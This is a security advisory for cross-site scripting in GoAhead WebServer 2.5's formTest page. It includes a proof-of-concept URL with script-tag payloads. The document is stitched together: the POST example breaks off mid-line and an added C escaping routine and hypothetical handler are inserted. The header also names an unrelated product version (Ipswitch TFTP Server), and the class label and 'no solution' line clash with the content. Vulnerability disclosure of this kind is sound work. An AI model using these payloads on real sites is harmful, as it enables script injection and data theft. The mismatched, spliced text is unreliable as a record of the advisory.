##############################################################################
# Title    : GoAhead WebServer Multiple Cross Site Scripting Vulnerabilities
# Author   : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor   : http://www.goahead.com/products/webserver/default.aspx
# Advisory : http://secpod.org/blog/?p=421
#            http://secunia.com/advisories/46896
#            http://secpod.org/advisories/SecPod_GoAhead_WebServer_Multiple_XSS_Vuln.txt
# Version  : Ipswitch TFTP Server 1.0.0.24
# Date     : 02/12/2011
##############################################################################

SecPod ID: 1029

23/09/2011 Issue Discovered
04/11/2011 Vendor Notified
           No Response from Vendor
02/12/2011 Advisory Released

Class: Information Disclosure
Severity: Medium

Overview:
---------
GoAhead WebServer v2.5 is prone to multiple cross site scripting vulnerabilities.

Technical Description:
----------------------
The vulnerabilities are caused by improper validation of input passed to the 'name' and 'address' parameters of the /goform/formTest page. The submitted values are echoed back into the response unencoded, which allows attackers to inject arbitrary script.

Impact:
-------
Successful exploitation could allow an attacker to execute malicious script in a user's browser and steal sensitive information.

Affected Software:
------------------
GoAhead WebServer 2.5

Tested on:
----------
GoAhead WebServer version 2.5 on Fedora Core 10.

References:
-----------
http://www.goahead.com
http://secpod.org/blog/?p=421
http://secunia.com/advisories/46896
http://www.goahead.com/products/webserver/default.aspx
http://webserver.goahead.com/forum/topic/169?replies=1#post-447
http://secpod.org/advisories/SecPod_GoAhead_WebServer_Multiple_XSS_Vuln.txt

Proof of Concept:
-----------------
1) GET request on the following page:

http://:8080/goform/formTest?name=%3Cscript%3Ealert(4321)%3C/script%3E&address=%3Cscript%3Ealert(1234)%3C/script%3E

2) POST request:
<form action=http://:8080/goform/formTest method=post>
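The root cause described above is a handler that writes the 'name' and 'address' values straight into the HTML response. The following is an added example, not GoAhead's own formTest code: a small HTML-escaping routine and a hypothetical handler body (render_form_test, assumed shape) that reproduces the unencoded echo when escape is 0 and the remediated, encoded output when escape is 1.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Escape the five characters that matter in an HTML text or attribute
 * context. Returns a malloc'd string that the caller frees. */
char *html_escape(const char *in) {
    size_t len = 0;
    for (const char *p = in; *p; p++) {
        switch (*p) {
        case '&':  len += 5; break;           /* &amp;  */
        case '<': case '>': len += 4; break;  /* &lt; &gt; */
        case '"':  len += 6; break;           /* &quot; */
        case '\'': len += 5; break;           /* &#39;  */
        default:   len += 1;
        }
    }
    char *out = malloc(len + 1);
    if (!out) return NULL;
    char *o = out;
    for (const char *p = in; *p; p++) {
        const char *rep = NULL;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        if (rep) { size_t r = strlen(rep); memcpy(o, rep, r); o += r; }
        else     { *o++ = *p; }
    }
    *o = '\0';
    return out;
}

/* Hypothetical handler body (assumed, not the project's formTest): builds
 * the fragment that echoes the two submitted parameters. escape == 0 is the
 * vulnerable behaviour from the advisory; escape != 0 encodes first.
 * Returns the number of bytes written, or -1 on allocation/truncation. */
int render_form_test(char *buf, size_t bufsz, const char *name,
                     const char *address, int escape) {
    char *n = escape ? html_escape(name) : NULL;
    char *a = escape ? html_escape(address) : NULL;
    if (escape && (!n || !a)) { free(n); free(a); return -1; }
    int rc = snprintf(buf, bufsz, "<h2>Name: %s</h2><h2>Address: %s</h2>",
                      escape ? n : name, escape ? a : address);
    free(n); free(a);
    return (rc < 0 || (size_t)rc >= bufsz) ? -1 : rc;
}
```

Fed the advisory's GET payload, the unescaped path returns the literal script tags in the response body while the escaped path returns only entity-encoded text.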
Solution:
---------
Not available

Risk Factor:
------------
CVSS Score Report:
ACCESS_VECTOR          = NETWORK
ACCESS_COMPLEXITY      = MEDIUM
AUTHENTICATION         = NONE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT       = PARTIAL
AVAILABILITY_IMPACT    = NONE
EXPLOITABILITY         = PROOF_OF_CONCEPT
REMEDIATION_LEVEL      = UNAVAILABLE
REPORT_CONFIDENCE      = CONFIRMED
CVSS Base Score = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)